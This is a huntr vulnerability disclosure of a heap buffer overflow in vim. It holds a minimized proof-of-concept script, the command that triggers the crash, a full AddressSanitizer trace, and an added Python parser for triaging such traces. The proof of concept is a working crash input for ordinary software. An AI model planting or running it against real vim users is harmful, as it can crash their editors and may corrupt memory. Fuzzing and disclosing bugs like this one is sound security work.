huntr report 5CDBC168-6BA1-4BC2-BA6C-28BE12166A53

Heap-based Buffer Overflow in vim/vim

Date: 2021-10-05 13:53:31
Reporter: thecrott
Source: www.huntr.dev
Tags: vim, buffer overflow, asan
EPSS: 0.001 (percentile 49.5%)

When fuzzing vim commit 56858e4ed (works with latest build) with clang 12 and ASan, I discovered a heap buffer overflow.

Proof of Concept

Here is the minimized PoC:

/\%.v
5/
c

Extract it, then run the crafted file with this command:
vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!

ASan stack trace:

aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!
=================================================================
==2889370==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000013d00 at pc 0x00000049a4ef bp 0x7ffffffdbf30 sp 0x7ffffffdb6f8
READ of size 4 at 0x621000013d00 thread T0
    #0 0x49a4ee in __asan_memmove (/home/aldo/vim/src/vim+0x49a4ee)
    #1 0x4d02e0 in vim_memsave /home/aldo/vim/src/alloc.c:597:2
    #2 0x75c5f58 in u_save_line /home/aldo/vim/src/undo.c:373:16
    #3 0x757d2c4 in u_saveline /home/aldo/vim/src/undo.c:3477:9
    #4 0x757a246 in u_save /home/aldo/vim/src/undo.c:257:2
    #5 0x43002fd in op_shift /home/aldo/vim/src/ops.c:145:9
    #6 0x22d91b1 in ex_operators /home/aldo/vim/src/ex_docmd.c:7743:6
    #7 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2
    #8 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17
    #9 0x5c1b974 in do_source /home/aldo/vim/src/scriptfile.c:1406:5
    #10 0x5bffda5 in cmd_source /home/aldo/vim/src/scriptfile.c:971:14
    #11 0x5bfdd3f in ex_source /home/aldo/vim/src/scriptfile.c:997:2
    #12 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2
    #13 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17
    #14 0x203af9a in do_cmdline_cmd /home/aldo/vim/src/ex_docmd.c:594:12
    #15 0x93c5f55 in exe_commands /home/aldo/vim/src/main.c:3081:2
    #16 0x93a0249 in vim_main2 /home/aldo/vim/src/main.c:773:2
    #17 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12
    #18 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x41fe2d in _start (/home/aldo/vim/src/vim+0x41fe2d)

0x621000013d00 is located 0 bytes to the right of 4096-byte region [0x621000012d00,0x621000013d00)
allocated by thread T0 here:
    #0 0x49aced in malloc (/home/aldo/vim/src/vim+0x49aced)
    #1 0x4cd2ac in lalloc /home/aldo/vim/src/alloc.c:244:11
    #2 0x4ccfa3 in alloc /home/aldo/vim/src/alloc.c:151:12
    #3 0x9426f31 in mf_alloc_bhdr /home/aldo/vim/src/memfile.c:884:21
    #4 0x941b675 in mf_new /home/aldo/vim/src/memfile.c:376:26
    #5 0x387b40b in ml_new_data /home/aldo/vim/src/memline.c:4068:15
    #6 0x3867f37 in ml_open /home/aldo/vim/src/memline.c:394:15
    #7 0x694e5f in open_buffer /home/aldo/vim/src/buffer.c:190:9
    #8 0x93ae2a2 in create_windows /home/aldo/vim/src/main.c:2851:9
    #9 0x939c80d in vim_main2 /home/aldo/vim/src/main.c:704:5
    #10 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12
    #11 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vim/src/vim+0x49a4ee) in __asan_memmove
Shadow bytes around the buggy address:
  0x0c427fffa750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffa7a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2889370==ABORTING
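
When triaging reports like the one above, the two things to file first are the faulting frame inside the project's own sources (here vim_memsave in alloc.c, below the sanitizer's __asan_memmove) and the allocation site of the overrun region (the 4096-byte block from lalloc). The following parser is an added example, not part of the original report or of vim; it works over a constructed excerpt of the trace above and the project prefix /home/aldo/vim/src/ is taken from that trace.

```python
import re

# Constructed sample: the leading lines of the ASan report above, trimmed to the frames needed here.
SAMPLE = """\
==2889370==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000013d00 at pc 0x00000049a4ef bp 0x7ffffffdbf30 sp 0x7ffffffdb6f8
READ of size 4 at 0x621000013d00 thread T0
    #0 0x49a4ee in __asan_memmove (/home/aldo/vim/src/vim+0x49a4ee)
    #1 0x4d02e0 in vim_memsave /home/aldo/vim/src/alloc.c:597:2
    #2 0x75c5f58 in u_save_line /home/aldo/vim/src/undo.c:373:16
    #3 0x757d2c4 in u_saveline /home/aldo/vim/src/undo.c:3477:9

0x621000013d00 is located 0 bytes to the right of 4096-byte region [0x621000012d00,0x621000013d00)
allocated by thread T0 here:
    #0 0x49aced in malloc (/home/aldo/vim/src/vim+0x49aced)
    #1 0x4cd2ac in lalloc /home/aldo/vim/src/alloc.c:244:11
    #2 0x4ccfa3 in alloc /home/aldo/vim/src/alloc.c:151:12
    #3 0x9426f31 in mf_alloc_bhdr /home/aldo/vim/src/memfile.c:884:21
"""

FRAME = re.compile(r"^\s*#(\d+) 0x[0-9a-f]+ in (\S+) (\S+)")
ERROR = re.compile(r"AddressSanitizer: (\S+) on address (0x[0-9a-f]+)")
ACCESS = re.compile(r"^(READ|WRITE) of size (\d+)", re.M)
REGION = re.compile(r"is located (\d+) bytes to the (left|right) of (\d+)-byte region")

def first_project_frame(frames, prefix):
    """First frame whose location is a source path under the project tree; sanitizer
    runtime and libc frames show a parenthesised binary+offset instead, so they are skipped."""
    for _, func, loc in frames:
        if loc.startswith(prefix):
            return func, loc
    return None

def triage(report, project_prefix):
    """Split an ASan report into faulting stack and allocation stack and pull the key fields."""
    head, _, tail = report.partition("allocated by thread")
    err, acc, reg = ERROR.search(head), ACCESS.search(head), REGION.search(head)
    if not (err and acc and reg):
        raise ValueError("not a complete AddressSanitizer report")
    frames = lambda text: [m.groups() for m in map(FRAME.match, text.splitlines()) if m]
    offset, side, region = int(reg[1]), reg[2], int(reg[3])
    return {
        "bug": err[1], "address": err[2],
        "access": acc[1], "size": int(acc[2]),
        "offset": offset, "side": side, "region_size": region,
        # an access starting `offset` bytes past the end overruns by offset + size bytes
        "oob_bytes": offset + int(acc[2]) if side == "right" else None,
        "fault": first_project_frame(frames(head), project_prefix),
        "alloc": first_project_frame(frames(tail), project_prefix),
    }
```

For this report the result pins the read to vim_memsave at alloc.c:597 overrunning a 4096-byte block obtained through lalloc by exactly 4 bytes, which is the information a dedup or fix-verification step needs.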

💥 Impact

This vulnerability is capable of crashing the software, bypassing protection mechanisms, modifying memory, and possibly allowing remote execution.